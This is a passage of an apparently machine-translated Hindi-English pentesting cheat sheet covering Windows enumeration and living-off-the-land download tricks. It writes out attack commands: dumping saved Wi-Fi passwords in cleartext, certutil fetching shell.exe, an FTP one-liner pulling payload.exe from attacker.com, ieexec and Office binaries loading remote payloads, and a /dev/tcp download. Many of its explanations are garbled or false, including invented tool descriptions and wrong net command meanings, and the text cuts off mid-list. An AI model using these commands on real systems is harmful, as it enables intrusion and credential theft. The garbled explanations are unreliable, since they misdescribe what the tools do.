net use x: \\computer\share #Mount the share locally
net share #Check current shares
वाईफ़ाई
वाईफ़ाई का उपयोग करने के लिए आवश्यक टूल्स
netsh wlan show profiles
- सभी उपयोगकर्ताओं के वाईफ़ाई प्रोफ़ाइल दिखाएँnetsh wlan show profile name="PROFILE_NAME" key=clear
- विशेष प्रोफ़ाइल के लिए पासवर्ड दिखाएँnetsh wlan show interfaces
- वाईफ़ाई इंटरफ़ेस की जानकारी दिखाएँnetsh wlan disconnect
- वाईफ़ाई से डिस्कनेक्ट करेंnetsh wlan connect name="PROFILE_NAME"
- वाईफ़ाई से कनेक्ट करें
वाईफ़ाई पासवर्ड का पता लगाना
netsh wlan show profiles
कमांड का उपयोग करके सभी उपयोगकर्ताओं के वाईफ़ाई प्रोफ़ाइल देखें।netsh wlan show profile name="PROFILE_NAME" key=clear
कमांड का उपयोग करके विशेष प्रोफ़ाइल के पासवर्ड को देखें।
वाईफ़ाई से डिस्कनेक्ट करना
netsh wlan disconnect
कमांड का उपयोग करके वाईफ़ाई से डिस्कनेक्ट करें।
वाईफ़ाई से कनेक्ट करना
netsh wlan connect name="PROFILE_NAME"
कमांड का उपयोग करके वाईफ़ाई से कनेक्ट करें।
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
SNMP
SNMP (Simple Network Management Protocol) एक नेटवर्क प्रबंधन प्रोटोकॉल है जो नेटवर्क उपकरणों को निर्दिष्ट पैरामीटरों की निगरानी करने के लिए उपयोग होता है। यह उपकरणों के स्थान, स्थिति, और संचार प्रोटोकॉल की जानकारी प्रदान करता है। SNMP का उपयोग नेटवर्क प्रशासनिक कार्यों को सुगम बनाने के लिए किया जाता है, जैसे कि नेटवर्क उपकरणों की निगरानी, त्रुटि पता लगाना, और सुरक्षा की जांच करना।
SNMP के द्वारा, एक पेंटेस्टर नेटवर्क परियोजनाओं के लिए उपयोगी जानकारी प्राप्त कर सकता है, जैसे कि नेटवर्क उपकरणों की IP पता, ऑपरेटिंग सिस्टम, और अन्य संबंधित जानकारी। इसके अलावा, SNMP का उपयोग नेटवर्क उपकरणों के साथ संचार स्थापित करने के लिए भी किया जा सकता है।
SNMP के लिए कुछ महत्वपूर्ण कमांड्स हैं:
snmpwalk
: यह कमांड नेटवर्क परियोजनाओं के लिए उपयोगी जानकारी प्राप्त करने के लिए उपयोग होता है।snmpget
: इस कमांड का उपयोग निर्दिष्ट पैरामीटरों की जानकारी प्राप्त करने के लिए किया जाता है।snmpset
: इस कमांड का उपयोग नेटवर्क उपकरणों की सेटिंग्स को संशोधित करने के लिए किया जाता है।
इन कमांड्स का उपयोग करके, एक पेंटेस्टर नेटवर्क परियोजनाओं के लिए उपयोगी जानकारी प्राप्त कर सकता है और नेटवर्क उपकरणों को निगरानी और संशोधित कर सकता है।
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
नेटवर्क इंटरफेस
एक नेटवर्क इंटरफेस एक डिवाइस होता है जो नेटवर्क कनेक्शन को संचालित करने के लिए उपयोग होता है। यह नेटवर्क के साथ संचार करने के लिए एक नेटवर्क प्रोटोकॉल का उपयोग करता है, जैसे TCP/IP। नेटवर्क इंटरफेस नेटवर्क कार्ड (NIC) द्वारा प्रदान किया जा सकता है, जो एक कंप्यूटर में स्थापित होता है।
एक नेटवर्क इंटरफेस को एक यूनिक आईपी (IP) पता भी दिया जा सकता है, जिसका उपयोग नेटवर्क कम्यूनिकेशन के लिए किया जाता है। नेटवर्क इंटरफेस को नेटवर्क कनेक्शन को सेटअप करने, डेटा पैकेट्स को प्राप्त करने और भेजने, और नेटवर्क के अन्य उपयोगकर्ताओं के साथ संचार करने के लिए उपयोग किया जाता है।
एक पेंटेस्टर के लिए, नेटवर्क इंटरफेस की जानकारी महत्वपूर्ण होती है क्योंकि इसका उपयोग नेटवर्क के विभिन्न हिस्सों को समझने और उन्हें अनुकरण करने के लिए किया जा सकता है। नेटवर्क इंटरफेस की जानकारी को प्राप्त करने के लिए, निम्नलिखित कमांड्स का उपयोग किया जा सकता है:
ipconfig /all
यह कमांड नेटवर्क इंटरफेस की सूची, उनके आईपी पते, मास्क, गेटवे, DNS सर्वर और अन्य जानकारी को प्रदर्शित करेगी।
netsh interface show interface
यह कमांड भी नेटवर्क इंटरफेस की सूची प्रदर्शित करेगी, लेकिन इसमें अधिक जानकारी जैसे इंटरफेस का स्थिति, नाम, टाइप, और अन्य विवरण भी शामिल हो सकते हैं।
route print
यह कमांड नेटवर्क की रूटिंग टेबल को प्रदर्शित करेगी, जिसमें नेटवर्क के बीच के रूट के बारे में जानकारी शामिल होगी।
arp -a
यह कमांड एआरपी (ARP) कैश टेबल को प्रदर्शित करेगी, जिसमें आईपी पते और उनके मैक एड्रेस के बीच के मैपिंग की जानकारी होगी।
netstat -ano
यह कमांड नेटवर्क कनेक्शन की सूची, पोर्ट नंबर, प्रोटोकॉल, स्थिति, और प्रक्रिया आईडी (PID) के बारे में जानकारी प्रदर्शित करेगी।
```bash
ipconfig /all
ARP तालिका
ARP तालिका एक नेटवर्क डिवाइस के लिए एक नेटवर्क पते और उसके मेक-एड्रेस (MAC) के बीच मैपिंग प्रदान करती है। यह टेबल नेटवर्क के अन्य डिवाइसों के साथ संचार करने के लिए आवश्यक होती है। ARP तालिका में प्रत्येक पंक्ति में नेटवर्क पता, MAC पता और इंटरफेस का नाम होता है।
आप निम्नलिखित कमांड का उपयोग करके ARP तालिका को देख सकते हैं:
arp -a
यह कमांड वर्तमान में आपके सिस्टम की ARP तालिका को प्रदर्शित करेगी।
arp -A
डाउनलोड
Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exe एक Windows कमांड लाइन उपकरण है जिसका उपयोग सर्टिफिकेट अभिमत को जनरेट करने और प्रशासकीय अनुरोधों को प्रस्तुत करने के लिए किया जाता है। इस उपकरण का उपयोग करके, आप सर्टिफिकेट अभिमत को जनरेट कर सकते हैं, सर्टिफिकेट अभिमत को अपडेट कर सकते हैं, सर्टिफिकेट अभिमत को रद्द कर सकते हैं और सर्टिफिकेट अभिमत को नवीनीकृत कर सकते हैं। यह उपकरण विंडोज सर्टिफिकेट सेवा (Windows Certificate Services) के साथ उपयोग करने के लिए उपयोगी होता है और सुरक्षा को बढ़ाने के लिए विभिन्न उपयोगों में उपयोग किया जा सकता है।
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe is a command-line utility in Windows that is used to manage certificates. It can be used to perform various operations such as installing, exporting, and verifying certificates. Certutil.exe can also be used to decode and encode certificates, as well as to retrieve information about certificates stored in the Windows certificate store.
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
डेस्कटॉप इमेज डाउनलोडर
यह एक प्रोग्राम है जिसका उपयोग डेस्कटॉप पर स्थापित छवियों को डाउनलोड करने के लिए किया जाता है। इसे चलाने के लिए निम्नलिखित चरणों का पालन करें:
- इस प्रोग्राम को डाउनलोड करें और अपने सिस्टम पर स्थापित करें।
- प्रोग्राम को खोलें और डेस्कटॉप पर डाउनलोड करने के लिए छवि का URL दर्ज करें।
- डाउनलोड करने के लिए "डाउनलोड" बटन पर क्लिक करें।
- छवि सफलतापूर्वक डाउनलोड हो जाएगी और आपके डेस्कटॉप पर सहेजी जाएगी।
ध्यान दें कि यह प्रोग्राम केवल उचित और अनुमति प्राप्त स्रोतों से छवियों को डाउनलोड करने के लिए उपयोग करना चाहिए। किसी अनधिकृत स्रोत से छवियों को डाउनलोड करने का प्रयास करने से बचें।
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
यह एक Windows उपकरण है जो Extensible Storage Engine (ESE) डेटाबेस फ़ाइलों को प्रबंधित करने के लिए उपयोग होता है। इसका उपयोग डेटाबेस की संरचना को जांचने, मरम्मत करने, और डेटाबेस फ़ाइलों को संपीड़ित करने के लिए किया जा सकता है। यह उपकरण एक कमांड लाइन आधारित उपकरण है और कई विभिन्न स्वरूपों में उपयोग किया जा सकता है।
इसका उपयोग करने के लिए, आपको एक कमांड प्रॉम्प्ट खोलना होगा और esentutl.exe
को उचित स्विच के साथ चलाना होगा। इसके बाद, आप विभिन्न कार्रवाईयों को कर सकते हैं, जैसे कि डेटाबेस की संरचना की जांच करना, डेटाबेस को मरम्मत करना, डेटाबेस फ़ाइलों को संपीड़ित करना, और अन्य संबंधित कार्रवाईयाँ।
यह उपकरण एक पेंटेस्टर के लिए उपयोगी हो सकता है जो विभिन्न डेटाबेस फ़ाइलों को जांचने और मरम्मत करने के लिए व्यापक निरीक्षण करना चाहता है।
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand.exe
Expand.exe
एक Windows सुविधा है जो एक फ़ाइल या फ़ोल्डर को विस्तारित करने के लिए उपयोग की जाती है। यह फ़ाइलों को उनके संपीड़न रूप में पुनर्स्थापित करने के लिए उपयोग किया जा सकता है।
इसका उपयोग करने के लिए, निम्नलिखित कमांड का उपयोग करें:
expand <source_file> <destination_file>
यहां <source_file>
विस्तारित करने के लिए फ़ाइल का पथ और नाम है, और <destination_file>
विस्तारित फ़ाइल का नया पथ और नाम है।
उदाहरण के लिए, यदि आप C:\archive.cab
फ़ाइल को C:\extracted
फ़ोल्डर में विस्तारित करना चाहते हैं, तो निम्नलिखित कमांड का उपयोग करें:
expand C:\archive.cab C:\extracted
यह कमांड C:\archive.cab
फ़ाइल को C:\extracted
फ़ोल्डर में विस्तारित करेगी।
expand \\webdav\folder\file.bat c:\ADS\file.bat
एक्सट्रैक32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
findstr.exe
is a command-line tool in Windows that is used to search for specific strings or patterns in files. It supports regular expressions and can search for strings in multiple files simultaneously. The tool is commonly used by pentesters and system administrators for various purposes, such as finding sensitive information, identifying configuration files, or searching for specific patterns in log files.
To use findstr.exe
, you can open a command prompt and type the following command:
findstr "search_string" file_name
Replace "search_string" with the string or pattern you want to search for, and "file_name" with the name of the file or files you want to search within. You can also use wildcards (*) to search for multiple files or patterns.
For example, to search for the string "password" in a file named "example.txt", you would use the following command:
findstr "password" example.txt
The command will display all lines in the file that contain the specified string. You can also use various options with findstr.exe
to customize the search, such as case sensitivity, searching subdirectories, or excluding certain files or directories from the search. To learn more about these options, you can use the /?
flag with the command:
findstr /?
This will display the help menu with all available options and their descriptions.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Ftp.exe
यह एक Windows कमांड लाइन उपकरण है जो FTP (File Transfer Protocol) संचार का समर्थन करता है। इसका उपयोग रिमोट सर्वर से फ़ाइलों को अपलोड और डाउनलोड करने के लिए किया जाता है। यह एक कमांड लाइन आधारित उपकरण होने के कारण, इसे स्क्रिप्टिंग और ऑटोमेशन के लिए भी उपयोग किया जा सकता है।
उपयोग
इसका उपयोग करने के लिए, आपको ftp
कमांड को Windows कमांड प्रोंप्ट में टाइप करना होगा। इसके बाद, आपको FTP सर्वर के साथ कनेक्ट करने के लिए open
कमांड का उपयोग करना होगा। एक बार जब आप सफलतापूर्वक कनेक्ट हो जाते हैं, तो आप फ़ाइलों को अपलोड और डाउनलोड करने के लिए विभिन्न कमांड का उपयोग कर सकते हैं।
उदाहरण
यहां कुछ उदाहरण हैं जो आपको ftp.exe
का उपयोग करने के तरीके दिखा सकते हैं:
FTP सर्वर के साथ कनेक्ट करना
ftp
open <एफटीपी_सर्वर>
फ़ाइलों को अपलोड करना
put <स्थानीय_फ़ाइल> <रिमोट_पथ>
फ़ाइलों को डाउनलोड करना
get <रिमोट_फ़ाइल> <स्थानीय_पथ>
फ़ाइलों की सूची देखना
ls
फ़ाइलों को हटाना
delete <रिमोट_फ़ाइल>
ये केवल कुछ उदाहरण हैं और ftp.exe
के अन्य कमांड और विकल्प भी उपलब्ध हैं। आप ftp /?
कमांड का उपयोग करके अधिक जानकारी प्राप्त कर सकते हैं।
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
hh.exe
is a command-line tool in Windows that is used to open compiled HTML Help (.chm) files. It is commonly used to view documentation or help files in the CHM format.
Usage
To use hh.exe
, open a command prompt and navigate to the directory where hh.exe
is located. Then, run the following command:
hh.exe <path_to_chm_file>
Replace <path_to_chm_file>
with the actual path to the CHM file you want to open.
Example
To open a CHM file named help.chm
located in the C:\docs
directory, you would run the following command:
hh.exe C:\docs\help.chm
This will open the CHM file in the default HTML Help Viewer application.
Additional Options
hh.exe
also supports additional command-line options for more advanced usage. Some of the commonly used options include:
/mapid <context_id>
: Opens the CHM file and displays the topic associated with the specified context ID./index <keyword>
: Opens the CHM file and displays the topic associated with the specified keyword in the index./search <query>
: Opens the CHM file and displays the search results for the specified query.
For more information about the available options, you can run hh.exe /?
to display the help documentation for hh.exe
.
Security Considerations
It's important to note that hh.exe
can execute scripts embedded in CHM files, which can potentially be used to execute malicious code. Therefore, it's recommended to only open CHM files from trusted sources and ensure that your system is protected with up-to-date antivirus software.
References
HH.exe http://some.url/script.ps1
यह एक प्रक्रिया है जो विंडोज प्रणाली में चलती है। यह प्रक्रिया विंडोज कमांड लाइन इंटरफेस (CMD) के माध्यम से चलाई जा सकती है। इस प्रक्रिया का उपयोग विभिन्न कार्यों को करने के लिए किया जा सकता है, जैसे कि फ़ाइलों को चलाना, सेटिंग्स को परिवर्तित करना, नेटवर्क कनेक्शन को सेट करना, आदि। इस प्रक्रिया का उपयोग पेंटेस्टिंग में भी किया जा सकता है ताकि हैकर विंडोज प्रणाली में विभिन्न सुरक्षा गठनों को देख सके और उन्हें उम्मीद से अधिक सुरक्षित बना सके।
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
Makecab.exe is a command-line tool in Windows that is used to create cabinet (.cab) files. Cabinet files are compressed archives that can contain multiple files and folders. This tool is commonly used for packaging and compressing files for distribution or installation purposes.
Syntax
makecab [/V[n]] [/D var=value ...] [/L dir] source [destination]
Parameters
/V[n]
: Specifies the verbosity level of the output. Use/V
for normal output and/Vn
for more verbose output (wheren
is a number from 1 to 3)./D var=value
: Defines a variable and its value for use in the makecab directive section./L dir
: Specifies the directory where the output files will be placed.source
: Specifies the file or files to be compressed.destination
: Specifies the name and location of the resulting .cab file. If not specified, the .cab file will be created in the current directory with the same name as the source file.
Examples
- Compress a single file:
makecab file.txt
- Compress multiple files:
makecab file1.txt file2.txt file3.txt
- Specify the output directory:
makecab /L C:\Output file.txt
- Specify the output file name:
makecab file.txt output.cab
Additional Information
- The makecab directive section, which is optional, allows you to specify additional instructions for the compression process.
- Makecab.exe supports various compression algorithms, including LZX, MSZIP, and Quantum.
- Cabinet files can be extracted using the
expand
command or by double-clicking on them in Windows Explorer.
For more information about the makecab.exe command, refer to the Microsoft documentation.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
यह एक Windows कमांड लाइन उपकरण है जो Microsoft Security Essentials और Windows Defender के साथ शामिल होता है। यह एंटीवायरस स्कैन करने, वायरस संक्रमण की जांच करने और सुरक्षा समस्याओं को हल करने के लिए उपयोग किया जाता है। इसका उपयोग करके, आप फ़ाइलों और फ़ोल्डरों को स्कैन कर सकते हैं, वायरस संक्रमण की जांच कर सकते हैं, निर्दिष्ट फ़ाइलों को हटा सकते हैं और अन्य सुरक्षा कार्रवाईयाँ कर सकते हैं। इसका उपयोग करने के लिए, आपको कमांड प्रॉम्प्ट में "MpCmdRun.exe" टाइप करना होगा और उपयोग करने के लिए उपयोग की जाने वाली संख्या को दर्ज करना होगा।
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
बदलें.exe
यह टूल Windows पर एक फ़ाइल को दूसरी फ़ाइल के साथ बदलने के लिए उपयोग किया जाता है। यह एक प्रभावी तरीका है जिससे आप किसी भी फ़ाइल को दूसरी फ़ाइल के साथ बदल सकते हैं, जैसे कि एक एक्सएक्सएक्स फ़ाइल को एक जीपीजी फ़ाइल के साथ बदलना।
उपयोग:
बदलें.exe <विद्यमान_फ़ाइल> <नई_फ़ाइल>
उदाहरण:
बदलें.exe विद्यमान.exe नई.exe
यह टूल बहुत सावधानीपूर्वक उपयोग करना चाहिए, क्योंकि इससे आपके सिस्टम में अद्यतित फ़ाइलों की गुणवत्ता प्रभावित हो सकती है। इसलिए, इसे केवल अधिकृत और विश्वसनीय संसाधनों पर उपयोग करें।
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
एक्सेल.exe
यह एक्सेल.exe फ़ाइल है। यह माइक्रोसॉफ्ट एक्सेल सॉफ़्टवेयर का एक भाग है जिसका उपयोग डेटा एन्ट्री, विश्लेषण और प्रबंधन के लिए किया जाता है। यह फ़ाइल एक्सेल सॉफ़्टवेयर को चलाने के लिए उपयोग की जाती है।
यदि आप इस फ़ाइल को चलाना चाहते हैं, तो आपको इसे डबल-क्लिक करना होगा या एक कमांड प्रोंप्ट के माध्यम से चलाना होगा। इसके बाद आप एक्सेल सॉफ़्टवेयर के सभी फ़ंक्शन का उपयोग कर सकते हैं।
ध्यान दें कि यह फ़ाइल केवल विंडोज प्लेटफ़ॉर्म पर काम करेगी। इसे अन्य प्लेटफ़ॉर्मों पर चलाने के लिए आपको अन्य संस्करण का उपयोग करना होगा।
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe is the executable file for Microsoft PowerPoint, a popular presentation software. It is commonly found on Windows operating systems and is used to create, edit, and view PowerPoint presentations.
Usage
To launch PowerPoint using powerpnt.exe, open the command prompt and type:
powerpnt.exe
This will open the PowerPoint application, allowing you to create or open a presentation.
Command Line Options
Powerpnt.exe supports various command line options that can be used to perform specific tasks. Here are some commonly used options:
/S
: Starts PowerPoint in slideshow mode./P <filename>
: Prints the specified presentation./N
: Starts PowerPoint without opening a new presentation./F <filename>
: Opens the specified presentation in full-screen mode./M <macro>
: Runs the specified macro when PowerPoint starts./PT <printername>
: Prints the presentation to the specified printer.
Example
To open a presentation named "example.pptx" in full-screen mode, use the following command:
powerpnt.exe /F example.pptx
This will launch PowerPoint and display the "example.pptx" presentation in full-screen mode.
Security Considerations
As with any executable file, it is important to ensure that powerpnt.exe is obtained from a trusted source and not tampered with. Running executables from untrusted sources can pose a security risk to your system.
Additionally, be cautious when opening PowerPoint files from unknown or untrusted sources, as they may contain malicious content or exploits. Always keep your system and antivirus software up to date to mitigate potential risks.
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
Squirrel.exe is a command-line utility that allows you to execute commands on a remote Windows system. It is commonly used by pentesters and hackers to gain unauthorized access to a target system.
Usage
To use Squirrel.exe, you need to have administrative privileges on the target system. Once you have obtained the necessary permissions, you can execute commands by running the following command:
squirrel.exe <command>
Replace <command>
with the command you want to execute on the target system.
Examples
Here are some examples of how you can use Squirrel.exe:
- To list all the files in a directory, you can use the following command:
squirrel.exe dir C:\path\to\directory
- To create a new user account on the target system, you can use the following command:
squirrel.exe net user <username> <password> /add
Replace <username>
and <password>
with the desired username and password for the new user account.
- To delete a file on the target system, you can use the following command:
squirrel.exe del C:\path\to\file
Replace C:\path\to\file
with the path to the file you want to delete.
Security Considerations
It is important to note that using Squirrel.exe to gain unauthorized access to a system is illegal and unethical. This tool should only be used for legitimate purposes, such as penetration testing or system administration.
Always ensure that you have proper authorization before using Squirrel.exe on a target system. Unauthorized use can result in severe legal consequences.
squirrel.exe --download [url to package]
Update.exe
यह एक Windows प्रोसेस है जो सिस्टम में सॉफ़्टवेयर अपडेट करने के लिए उपयोग होता है। यह प्रोसेस आपके सिस्टम में स्वतः चलता है और नवीनतम अपडेट उपलब्ध होने पर आपको सूचित करता है। यदि आपके सिस्टम में कोई सॉफ़्टवेयर अपडेट उपलब्ध होता है, तो आप इस प्रोसेस को चालू रख सकते हैं ताकि आपका सिस्टम सुरक्षित रहे और नवीनतम सुरक्षा अपडेट प्राप्त कर सकें।
यदि आपको लगता है कि आपके सिस्टम में यह प्रोसेस अनुचित रूप से चल रहा है या आपको इसके बारे में किसी अन्य संकेत मिलता है, तो आप इसे अविश्वसनीय मान सकते हैं और उसे अवरोधित कर सकते हैं। इसके लिए, आपको टास्क मैनेजर को खोलना होगा, उसमें "Processes" टैब पर जाना होगा और "Update.exe" प्रोसेस को चुनना होगा। फिर, आपको "End Process" बटन पर क्लिक करना होगा ताकि यह प्रोसेस बंद हो जाए।
ध्यान दें कि यह प्रोसेस वास्तव में एक अवधारणा है और आपके सिस्टम में अन्य नामों से भी चल सकता है, इसलिए आपको इसे अवरोधित करने से पहले सुनिश्चित करना चाहिए कि यह वास्तव में एक अविश्वसनीय प्रोसेस है।
Update.exe --download [url to package]
Winword.exe is the executable file for Microsoft Word, which is a popular word processing software. It is commonly found in the Microsoft Office suite and is used for creating, editing, and formatting documents.
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
यह एक Windows Subsystem for Linux (WSL) कमांड है जो Windows में Linux द्वारा चलाए जा रहे एप्लिकेशन्स को समर्थित करता है। WSL के माध्यम से, आप Windows में एक Linux डिस्ट्रीब्यूशन को चला सकते हैं और Linux टूल्स और कमांड्स का उपयोग कर सकते हैं।
इसका उपयोग करने के लिए, आपको एक टर्मिनल खोलनी होगी और wsl
कमांड को लिखना होगा। इसके बाद, आपको उपयोगकर्ता नाम और पासवर्ड दर्ज करने के लिए पूछा जाएगा। एक बार जब आप सफलतापूर्वक प्रमाणीकृत हो जाएंगे, आपको Linux डिस्ट्रीब्यूशन में प्रवेश मिलेगा और आप उसे विशेष तरीके से उपयोग कर सकेंगे।
यह कमांड विभिन्न उपयोगकर्ता अनुभवों के लिए उपयोगी हो सकती है, जैसे कि वेब डेवलपमेंट, सिक्योरिटी टेस्टिंग, और अन्य लिनक्स आधारित कार्यों के लिए।
यदि आपके पास WSL इंस्टॉल नहीं है, तो आपको पहले इसे इंस्टॉल करना होगा। WSL को इंस्टॉल करने के लिए, आपको Windows के संस्करण 1903 या उसके बाद का उपयोग करना होगा और PowerShell में निम्नलिखित कमांड को चलाना होगा:
wsl --install
इसके बाद, आपको एक Linux डिस्ट्रीब्यूशन का चयन करना होगा और उसे इंस्टॉल करने के लिए निर्देशों का पालन करना होगा।
ध्यान दें कि WSL केवल Windows 10 के निश्चित संस्करणों में ही समर्थित है। इसलिए, आपको अपने सिस्टम के संस्करण की जांच करनी चाहिए और उचित संस्करण का उपयोग करना चाहिए।
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
विविध
Basic CMD commands for pentesters
पेंटेस्टर्स के लिए मूल CMD कमांड्स
Here are some basic CMD commands that can be useful for pentesters:
पेंटेस्टर्स के लिए कुछ मूल CMD कमांड्स यहां हैं जो उपयोगी हो सकते हैं:
-
ipconfig: Displays the IP configuration for all network interfaces.
-
ipconfig: सभी नेटवर्क इंटरफेस के लिए आईपी कॉन्फ़िगरेशन प्रदर्शित करता है।
-
netstat: Displays active network connections and listening ports.
-
netstat: सक्रिय नेटवर्क कनेक्शन और सुनने वाले पोर्ट प्रदर्शित करता है।
-
tasklist: Lists all running processes.
-
tasklist: सभी चल रहे प्रक्रियाओं की सूची बनाता है।
-
taskkill: Terminates a running process.
-
taskkill: चल रही प्रक्रिया को समाप्त करता है।
-
systeminfo: Displays detailed information about the computer's hardware and software.
-
systeminfo: कंप्यूटर के हार्डवेयर और सॉफ़्टवेयर के बारे में विस्तृत जानकारी प्रदर्शित करता है।
-
net user: Manages user accounts, including creating, modifying, and deleting accounts.
-
net user: उपयोगकर्ता खातों का प्रबंधन करता है, जिसमें खाते बनाना, संशोधित करना और हटाना शामिल है।
-
net localgroup: Manages local groups, including creating, modifying, and deleting groups.
-
net localgroup: स्थानीय समूहों का प्रबंधन करता है, जिसमें समूह बनाना, संशोधित करना और हटाना शामिल है।
-
net share: Manages shared resources, including creating, modifying, and deleting shares.
-
net share: साझा संसाधनों का प्रबंधन करता है, जिसमें साझा संसाधन बनाना, संशोधित करना और हटाना शामिल है।
-
net use: Connects or disconnects a computer from a shared resource or displays information about current connections.
-
net use: एक कंप्यूटर को साझा संसाधन से कनेक्ट या डिस्कनेक्ट करता है या वर्तमान कनेक्शन के बारे में जानकारी प्रदर्शित करता है।
-
net view: Displays a list of resources being shared on a computer.
-
net view: कंप्यूटर पर साझा की जा रही संसाधनों की सूची प्रदर्शित करता है।
-
net session: Lists or disconnects sessions between the computer and other computers on the network.
-
net session: कंप्यूटर और नेटवर्क पर अन्य कंप्यूटरों के बीच सत्रों की सूची बनाता है या डिस्कनेक्ट करता है।
-
net localgroup administrators: Lists the members of the local Administrators group.
-
net localgroup administrators: स्थानीय व्यवस्थापक समूह के सदस्यों की सूची बनाता है।
-
net localgroup "Remote Desktop Users": Lists the members of the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users": रिमोट डेस्कटॉप उपयोगकर्ता समूह के सदस्यों की सूची बनाता है।
-
net accounts: Displays the password policy for the domain or the local computer.
-
net accounts: डोमेन या स्थानीय कंप्यूटर के लिए पासवर्ड नीति प्रदर्शित करता है।
-
net group: Lists the members of a group or adds or removes users from a group.
-
net group: समूह के सदस्यों की सूची बनाता है या समूह से उपयोगकर्ताओं को जोड़ता या हटाता है।
-
net share IPC$: Lists the shares on a remote computer.
-
net share IPC$: एक रिमोट कंप्यूटर पर साझा संसाधनों की सूची बनाता है।
-
net share C$: Lists the shares on the C drive of a remote computer.
-
net share C$: एक रिमोट कंप्यूटर के C ड्राइव पर साझा संसाधनों की सूची बनाता है।
-
net share ADMIN$: Lists the shares on the ADMIN$ folder of a remote computer.
-
net share ADMIN$: एक रिमोट कंप्यूटर के ADMIN$ फ़ोल्डर पर साझा संसाधनों की सूची बनाता है।
-
net share print$: Lists the shares on the print$ folder of a remote computer.
-
net share print$: एक रिमोट कंप्यूटर के print$ फ़ोल्डर पर साझा संसाधनों की सूची बनाता है।
-
**net share ADMIN$=C:**: Creates a share named ADMIN$ that points to the C drive of the local computer.
-
**net share ADMIN$=C:**: एक साझा बनाता है जिसका नाम ADMIN$ है और जो स्थानीय कंप्यूटर के C ड्राइव को निशानित करता है।
-
net share IPC$ /delete: Deletes the IPC$ share on a remote computer.
-
net share IPC$ /delete: एक रिमोट कंप्यूटर पर IPC$ साझा को हटाता है।
-
net share C$ /delete: Deletes the C$ share on a remote computer.
-
net share C$ /delete: एक रिमोट कंप्यूटर पर C$ साझा को हटाता है।
-
net share ADMIN$ /delete: Deletes the ADMIN$ share on a remote computer.
-
net share ADMIN$ /delete: एक रिमोट कंप्यूटर पर ADMIN$ साझा को हटाता है।
-
net share print$ /delete: Deletes the print$ share on a remote computer.
-
net share print$ /delete: एक रिमोट कंप्यूटर पर print$ साझा को हटाता है।
-
net user /add: Adds a user account.
-
net user /add: एक उपयोगकर्ता खाता जोड़ता है।
-
net user /delete: Deletes a user account.
-
net user /delete: एक उपयोगकर्ता खाता हटाता है।
-
net user /domain: Lists the user accounts in a domain.
-
net user /domain: एक डोमेन में उपयोगकर्ता खातों की सूची बनाता है।
-
net user /domain /add: Adds a user account to a domain.
-
net user /domain /add: एक डोमेन में एक उपयोगकर्ता खाता जोड़ता है।
-
net user /domain /delete: Deletes a user account from a domain.
-
net user /domain /delete: एक डोमेन से एक उपयोगकर्ता खाता हटाता है।
-
net user /domain /passwordreq:yes: Enforces password complexity requirements for user accounts in a domain.
-
net user /domain /passwordreq:yes: एक डोमेन में उपयोगकर्ता खातों के लिए पासवर्ड जटिलता आवश्यकताओं को प्रबल करता है।
-
net user /domain /passwordchg:yes: Forces users to change their password at the next logon in a domain.
-
net user /domain /passwordchg:yes: एक डोमेन में उपयोगकर्ताओं को अगले लॉगऑन पर अपना पासवर्ड बदलने के लिए मजबूर करता है।
-
net user /domain /passwordreq:no: Disables password complexity requirements for user accounts in a domain.
-
net user /domain /passwordreq:no: एक डोमेन में उपयोगकर्ता खातों के लिए पासवर्ड जटिलता आवश्यकताओं को अक्षम करता है।
-
net user /domain /passwordchg:no: Disables the requirement for users to change their password at the next logon in a domain.
-
net user /domain /passwordchg:no: एक डोमेन में उपयोगकर्ताओं को अगले लॉगऑन पर अपना पासवर्ड बदलने की आवश्यकता को अक्षम करता है।
-
net localgroup administrators /add: Adds a user or group to the local Administrators group.
-
net localgroup administrators /add: स्थानीय व्यवस्थापक समूह में एक उपयोगकर्ता या समूह जोड़ता है।
-
net localgroup administrators /delete: Removes a user or group from the local Administrators group.
-
net localgroup administrators /delete: स्थानीय व्यवस्थापक समूह से एक उपयोगकर्ता या समूह हटाता है।
-
net localgroup "Remote Desktop Users" /add: Adds a user or group to the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users" /add: रिमोट डेस्कटॉप उपयोगकर्ता समूह में एक उपयोगकर्ता या समूह जोड़ता है।
-
net localgroup "Remote Desktop Users" /delete: Removes a user or group from the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users" /delete: रिमोट डेस्कटॉप उपयोगकर्ता समूह से एक उपयोगकर्ता या समूह हटाता है।
-
net localgroup "Remote Desktop Users" username /add: Adds a user to the Remote Desktop Users group.
-
